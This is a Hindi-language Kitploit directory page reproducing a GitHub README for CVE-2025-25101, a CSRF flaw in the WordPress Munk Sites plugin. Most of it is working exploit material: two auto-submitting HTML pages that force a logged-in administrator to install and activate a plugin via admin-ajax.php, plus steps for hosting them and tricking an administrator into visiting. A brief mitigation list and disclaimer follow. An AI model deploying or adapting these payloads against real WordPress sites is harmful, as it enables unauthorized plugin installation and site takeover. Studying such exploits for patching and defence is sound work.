Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-25101 — वर्डप्रेस Munk Sites प्लगइन <= 1.0.7 - CSRF से मनमाना प्लगइन इंस्टॉलेशन भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-25101
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफिशिंगसामाजिक इंजीनियरिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-25101

CVE-2025-25101

वर्डप्रेस Munk Sites प्लगइन <= 1.0.7 - CSRF से मनमाना प्लगइन इंस्टॉलेशन भेद्यता

रिपॉजिटरी देखें
141 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚀 CVE-2025-25101 - WordPress Munk Sites प्लगइन <= 1.0.7 - CSRF से मनमानी प्लगइन स्थापना

📌 अवलोकन

CVE-2025-25101 MetricThemes Munk Sites प्लगइन के लिए WordPress में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता है (संस्करण ≤ 1.0.7)। यह भेद्यता एक अप्रमाणित हमलावर को एक व्यवस्थापक को मनमानी प्लगइन स्थापित और सक्रिय करने के लिए मूर्ख बनाने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड निष्पादन (RCE) या वेबसाइट समझौता हो सकता है।

🛑 प्रभावित संस्करण

  • Munk Sites प्लगइन <= 1.0.7
  • WordPress कोई भी संस्करण जहां प्लगइन सक्रिय है

🛡️ सुरक्षा रेटिंग (CVSS स्कोर)

स्कोरगंभीरतासंस्करणवेक्टर स्ट्रिंग
9.6🔥 क्रिटिकल3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 एक्सप्लॉइट विवरण

🛠️ भेद्यता कैसे काम करती है:

Munk Sites प्लगइन में CSRF दोष एक हमलावर को लॉग-इन WordPress व्यवस्थापक को उनकी सहमति के बिना कोई भी WordPress प्लगइन स्थापित और सक्रिय करने के लिए मजबूर करने की अनुमति देता है। यह एक असुरक्षित admin-ajax.php अनुरोध का शोषण करके किया जाता है जिसमें CSRF टोकन सत्यापन का अभाव है।

📌 एक्सप्लॉइट कार्यप्रवाह:

  1. हमलावर CSRF पेलोड वाला एक दुर्भावनापूर्ण वेबपेज तैयार करता है।
  2. पीड़ित (WordPress व्यवस्थापक) हमलावर के वेबपेज पर जाता है।
  3. एक्सप्लॉइट चुपचाप एक मनमानी प्लगइन स्थापित और सक्रिय करने के लिए WordPress को अनुरोध भेजता है।
  4. प्लगइन बिना किसी व्यवस्थापक इंटरैक्शन के स्थापित और सक्रिय हो जाता है।

💻 एक्सप्लॉइट कोड

1️⃣ CSRF एक्सप्लॉइट - प्लगइन स्थापित करें

यह पेलोड पीड़ित को hello-world प्लगइन स्थापित करने के लिए मजबूर करता है।

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ CSRF एक्सप्लॉइट - प्लगइन सक्रिय करें

यह पेलोड पीड़ित को hello-world प्लगइन सक्रिय करने के लिए मजबूर करता है।

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 उपयोग कैसे करें

  1. दुर्भावनापूर्ण HTML फ़ाइलों (install.html और activate.html) को हमलावर-नियंत्रित सर्वर पर होस्ट करें।
  2. एक WordPress व्यवस्थापक को सामाजिक इंजीनियरिंग करके install.html पर जाने के लिए मनाएं।
  3. एक बार प्लगइन स्थापित हो जाने पर, उन्हें activate.html पर जाने के लिए बरगलाएं।
  4. hello-world प्लगइन व्यवस्थापक की सहमति के बिना स्थापित और सक्रिय हो जाएगा!

🚧 शमन

🔒 अपनी WordPress साइट को कैसे सुरक्षित रखें:

  • Munk Sites प्लगइन के नवीनतम संस्करण में अपग्रेड करें (यदि पैच उपलब्ध है)।
  • CSRF प्रयासों को अवरुद्ध करने के लिए Wordfence या Sucuri जैसे WordPress सुरक्षा प्लगइन का उपयोग करें।
  • .htaccess या Nginx कॉन्फ़िगरेशन में सुरक्षा नियमों का उपयोग करके admin-ajax.php तक पहुंच प्रतिबंधित करें।
  • सुनिश्चित करें कि केवल प्रमाणित और अधिकृत उपयोगकर्ता ही प्लगइन स्थापित या सक्रिय कर सकते हैं।
  • wp_nonce_field() और check_admin_referer() का उपयोग करके CSRF सुरक्षा लागू करें।

📜 अस्वीकरण

⚠️ यह एक्सप्लॉइट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। ⚠️ स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है। ⚠️ लेखक इस कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।


⭐ समर्थन और योगदान

यदि आपको यह शोध मूल्यवान लगता है, तो कृपया रिपॉजिटरी को ⭐ स्टार करने और नई भेद्यताओं की रिपोर्ट करके योगदान करने में संकोच न करें।

द्वारा: Nxploit | Khaled Alenazi

टूल डाउनलोड करें